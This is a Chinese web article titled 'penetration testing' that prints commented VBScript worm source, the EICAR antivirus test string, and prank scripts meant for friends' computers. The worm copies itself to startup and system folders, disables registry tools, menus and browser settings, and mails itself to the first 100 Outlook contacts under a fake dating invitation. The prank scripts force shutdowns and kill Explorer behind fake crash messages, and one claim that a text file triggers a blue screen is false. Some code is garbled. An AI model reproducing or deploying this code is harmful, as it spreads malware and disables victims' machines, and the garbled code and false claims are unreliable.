渗透测试

本文目录一览：

• 1、电脑病毒源代码介绍
• 2、电脑病毒查杀代码
• 3、恶搞电脑病毒代码有哪些

电脑病毒源代码介绍

电脑中了病毒想从它的源代码入手怎么办呢!有我在，下面由我给你做出详细的电脑病毒源代码介绍!希望对你有帮助!

电脑病毒源代码介绍：

电脑病毒源代码一：

on error resume next

set fs=createobject("ing.filesystemobject" '创建一个能与 操作系统 沟通的对象,再利用该对象的各种 方法 对注册表进行操作

set dir1=fs.getspecialfolder(0) '获取windows/winnt文件夹位置

set dir2=fs.getspecialfolder(1) '获取system32/system文件夹位置

set so=createobject("ing.filesystemobject"

dim r '定义一个变量

set r=createobject("w.shell"

so.getfile(w.fullname).copy(dir1"\win32system.vbs" '复制病毒副本到windows/winnt文件夹位置

so.getfile(w.fullname).copy(dir2"\win32system.vbs" '复制病毒副本到system32/system文件夹位置

so.getfile(w.fullname).copy(dir1"\start menu\programs\启动\win32system.vbs" '复制病毒副本到start menu启动菜单

'下面是对注册表的恶意修改和简单的依靠oe传播

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norun",1,"reg_dword" '修改注册表，禁止“运行”菜单

r.regwrite "kcu\software\microsoft\windows\currentversion\policies\explorer\noclose",1,"reg_dword" '修改注册表，禁止“关闭”菜单

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodrives",63000000,"reg_dword" '修改注册表，隐藏所有逻辑盘符

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\system\disableregistrytools",1,"reg_dword" '修改注册表，禁止注册表编辑

r.regwrite "hklm\software\microsoft\windows\currentversion\run\scanregistry","" '修改注册表，禁止开机注册表扫描

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nologoff",1,"reg_dword" '修改注册表，禁止“注销”菜单

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\norealmode",1,"reg_dword" '修改注册表，禁止ms-dos实模式

r.regwrite "hklm\software\microsoft\windows\currentversion\run\win32system","win32system.vbs" '修改注册表，使这个脚本本身开机自动运行

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodesktop",1,"reg_dword" '修改注册表，禁止显示桌面图标

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\disabled",1,"reg_dword" '修改注册表，禁止纯dos模式

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosettaskbar",1,"reg_dword" '修改注册表，禁止“任务栏和开始”菜单

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\noviewcontextmenu",1,"reg_dword" '修改注册表，禁止右键菜单

电脑病毒源代码二：

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosetfolders",1,"reg_dword" '修改注册表，禁止控制面板

r.regwrite "hklm\software\classes\.reg\","txtfile" '修改注册表，禁止导入使用.reg文件，改为用txt文件的关联

r.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticecaption","警告" '设置开机提示框标题

r.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticetext","您中vbs脚本病毒了，哭吧~" '设置开机提示框文本内容

set ol=createobject("outlook.application" '创建outlook文件对象用于传播

on error resume next

for x=1 to 100

set mail=ol.createitem(0)

mail.to=ol.getnamespace("mapi".addresslists(1).addressentries(x) '用于向地址簿的前100名发送此 vbs病毒，可以算是简单弱智的蠕虫了吧~~

mail.subject="今晚你来吗?" '邮件主题

mail.body="朋友你好：您的朋友rose给您发来了热情的邀请。具体情况请阅读随信附件，祝您好运! 同城约会网" '邮件内容

mail.attachments.add(dir2"win32system.vbs"

mail.send

next

ol.quit

'下面是对internet explore 选项的恶意修改

r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsercontextmenu",1,"reg_dword" '修改注册表，禁止鼠标右键

r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowseroptions",1,"reg_dword" '修改注册表，禁止internet选项

r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsersaveas",1,"reg_dword" '修改注册表，禁止“另存为”

r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nofileopen",1,"reg_dword" '修改注册表，禁止“文件/打开”菜单

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\advanced",1,"reg_dword" '修改注册表，禁止更改高级页设置

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\cache internet",1,"reg_dword" '修改注册表，禁止更改临时文件设置

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\autoconfig",1,"reg_dword" '修改注册表，禁止更改自动配置

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\homepage",1,"reg_dword" '修改注册表，禁止更改主页，即“主页”变灰

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\history",1,"reg_dword" '修改注册表，禁止更改历史记录设置

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\connwiz admin lock",1,"reg_dword" '修改注册表，禁止更改internet连接向导

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\securitytab",1,"reg_dword" '修改注册表，禁止更改安全项

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\resetwebsettings",1,"reg_dword" '修改注册表，禁止“重置web设置”

r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\noviewsource",1,"reg_dword" '修改注册表，禁止查看源文件

r.regwrite "hkcu\software\policies\microsoft\internet explorer\infodelivery\restrictions\noaddingsubions",1,"reg_dword" '修改注册表，禁止添加脱机计划

电脑病毒查杀代码

电脑杀毒软件测试代码的使用方法：

1、在桌面上新建一个文本文档；



2、将以下代码复制到文本文档：

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*



3、按下Ctrl+S或点击“文件”→“保存”来存储当前文档；



4、关闭该文本，并右键使用杀毒软件扫描该文本；



5、删除该文本文件。



电脑杀毒软件测试代码的过程中，评定杀毒软件等级：

特等：复制完代码后便提示内存有病毒；

优等：刚保存完就提示病毒（或者直接删除）；

中等：保存后几秒提示病毒（或者直接删除）；

下等：需自己启动病毒扫描查杀才提示病毒（或者直接删除）；

劣等：无论怎么扫描都无法提示病毒（或者直接删除）。

以上步骤便是电脑杀毒软件测试代码的使用方法，实际上这项测试并不意味着杀毒软件的能力高度，完全为了测试电脑杀毒软件的主动防御能力，与杀毒能力无关。

恶搞电脑病毒代码有哪些

有时候想和朋友们玩玩，搞点恶搞电脑病毒给他们，要怎么办呢?下面由我给你做出详细的恶搞电脑病毒代码介绍!希望对你有帮助!

恶搞电脑病毒代码介绍一：

首先在电脑上新建一个TXT文档

然后把下面这段代码输入进去

On Error Resume Next

Dim WSHshellA

Set WSHshellA = wscript.CreateObject("wscript.shell")

WSHshellA.run "cmd.exe /c shutdown -s -t 90 -c ""快喊我是猪，不喊就马上让你关机，不信，试试···"" ", 0, True

Dim a

Do While (a "我是猪")

a = InputBox("快说我是猪,不叫就不关机，快点，说 ", "说不说", "不说", 8000, 7000)

MsgBox Chr(13) + Chr(13) + Chr(13) + a, 0, "MsgBox"

Loop

MsgBox Chr(13) + Chr(13) + Chr(13) + "早说就行了嘛!好,不关了"

WSHshella.run "cmd.exe /c shutdown -a"

然后保存

然后把这个文本文档的后缀改为vbs 也就是说新建的文本文档本来是.TXT的后缀，

你要修改为.VBS的后缀

恶搞电脑病毒代码介绍二：

新建一个文本文档，然后插入hhjsfdusnjwindow,,hffjfiukjei 508963kfdjksfjjkk,最后插入图片，如果对方有邮箱，就发给他

他一打开就会出现你插入的图片，然后出现 蓝屏 (效果7—10分钟)(注：做好病毒后不要打开，否则会出现以上说的情况)

恶搞电脑病毒代码介绍三：

新建一个文本文档(.txt)，要复制以下代码：

@echo off

color 4

tskill explorer

echo .

echo .

echo .

echo .

echo 警告：在病毒执行期间禁止关闭电源，

echo 否则你就和你心爱的电脑说

echo .

echo . BYE-BYE

echo .

echo Computer system crash!

echo .

echo .

echo I am a virus, my name is Ghost.

echo 我是魔鬼病毒，在这个堕落的世界上苏醒了。

echo .

echo . Warning! CPU has been changed please re-enter CPU settings

echo. in the CMOS setuo and remember to save before quit.

echo. Secondary IDE channel no 80 conductor cable installed.

set /p select=:)

if "%select%"=="" goto start

:start

shutdown -r -t 10 -c "您的计算机上带有魔鬼病毒，今天是它的发作日期。病毒已经破坏了您的系统，您的计算机将在10秒钟后重启。"

::结束

再另存为：名字.bat 你要记住"名字"后面要加".bat"

就可以了，没有任何破坏性，吓吓人。

你可以试试看看效果。